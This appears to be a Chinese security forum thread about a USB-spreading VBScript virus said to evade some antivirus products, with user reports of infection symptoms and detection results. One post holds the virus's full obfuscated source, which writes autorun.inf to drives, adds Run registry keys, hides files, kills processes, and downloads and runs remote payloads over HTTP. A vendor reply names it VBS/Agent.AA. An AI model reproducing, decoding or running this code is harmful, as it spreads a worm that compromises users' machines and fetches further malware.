U盘病毒（可过小红伞和fs）

无尽藏海

这么厉害

zlq7zj

我早上 中了 后就 在启动项里面有了一个v的启动项
然后system32和windows目录都有一个v的文件！！ 不过删掉就没有了

好像这个东西就是 前段时间说的专门删除xx电影的那个病毒吧。

alskdjfhg

真是想不到那么多打牌都挂的情况下，国产的木马清除大师可以拦截他

xiaohf

给windows 清理助手干掉了（不放心用助手扫描了下）

qigang

Rising20.27.31未杀！

卡巴也未见有反应。

dericyeoh

C:\Users\Deric Yeoh\Desktop\.vbs.rar>>.vbs        VBS.Decoder.q        病毒        已删除/隔离

jimmyleo

1. on error resume next
   
2. dyz="ire=|9.1|:gvy=|UT|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>||}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&|[nhgbeha]|&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<YV}{V=V+1}{VS :execute(ext&?dyz))?&ext&?zcx))?&fut&?gt()?&ext&?gtz?&aft&?ei(name,wt)?&ext&?eiz?&aft&?df(wh)?&ext&?dfz?&aft&?bf(wh,wt,da)?&ext&?bfz?&aft&?bi(wh)?&ext&?biz?&aft&?rt(wh,li)?&ext&?rtz?&aft&?wr(rna,rda)?&ext&?wrz?&aft&?rr(rna,pa)?&ext&?rrz?&aft&?ar(file,cg)?&ext&?arz?&aft&?dn(loc,web,ris,min)?&ext&?dnz?&aft&?pr(pcs,gs)?&ext&?prz?&aft&?ec(wt)?&ext&?ecz?&aft&?co(wh)?&ext&?coz?&aft&?rs(sw)?&ext&?rsz?&aft&?hi(sw)?&ext&?hiz?&aft&?gi(ids,fid,eid,fname,furl)?&ext&?giz?&aft&?dw(pcs,fn,furl,kill)?&ext&?dwz?&aft&?us(sw)?&ext&?usz?&aft&?cu()?&ext&?cuz?&aft&?km(sw)?&ext&?kmz?&aft&?cf(wh)?&ext&?cfz?&eft)
   
3. |erz |&gvy gura ps=gehr" :kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs" :ext=":execute(uc(" :cuz="phf=ee(|bfj|,1)4}{qb}{qph=ee(|gtf|,1)pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=1 naq aazva naq bb1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:xz 0:jfpevcg.dhvg}{ybbc" :usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q|A:| naq q |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg" :dwz="vs ee(|trq|,1)sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100" :giz="vq=ee(|vqq|,1)}{qb juvyr svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1" :hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)" next?:rsz="vs fj=1 naq ee(efc&efa,0)ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs" resume error ?\??:on ju,7?:rn="dim d:j=" bhp:iof.pybfr:ne iof="sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr" ju:frg :aft='eft&fut:coz="qs' :zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{qwf=ee(|qwf|,1):vs vfqngr(qwf) naq qngr-pqngr(qwf)>30 gura je |bfj|,4}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs" :l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:" :ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg" :prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2" :dnz="ne ybp,0:frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs" :eft=")):end function" :arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat" :rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0" vs?:wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|" vs}{ryfr}{eg="0}{raq" vs}{e.pybfr}{raq gura}{eg="e.ernqnyy}{ryfr}{eg=0}{raq" yvfunction er(sco)
   
4. if err.number<>0 or sco<0 then
   
5. err.clear
   
6. er=true
   
7. if sco<>0 and rr("ded",1)<>cstr(date) then
   
8. wr "oer",rr("oer",1)+abs(sco)
   
9. if rr("oer",1)>100 then wr "ded",date:wr "oer",0
   
10. end if
    
11. end if
    
12. end function

复制代码

傻猪猪米走鸡

这段代码能搞什么？

Graybird

The file '.vbs' has been determined to be 'MALWARE'. Our analysts named the threat VBS/Agent.AA. The term "VBS/" denotes a Visual Basic script-virus.Detection will be added to our virus definition file (VDF) with one of the next updates.

33629544

楼上的那位 是哪个杀毒软件公司回复的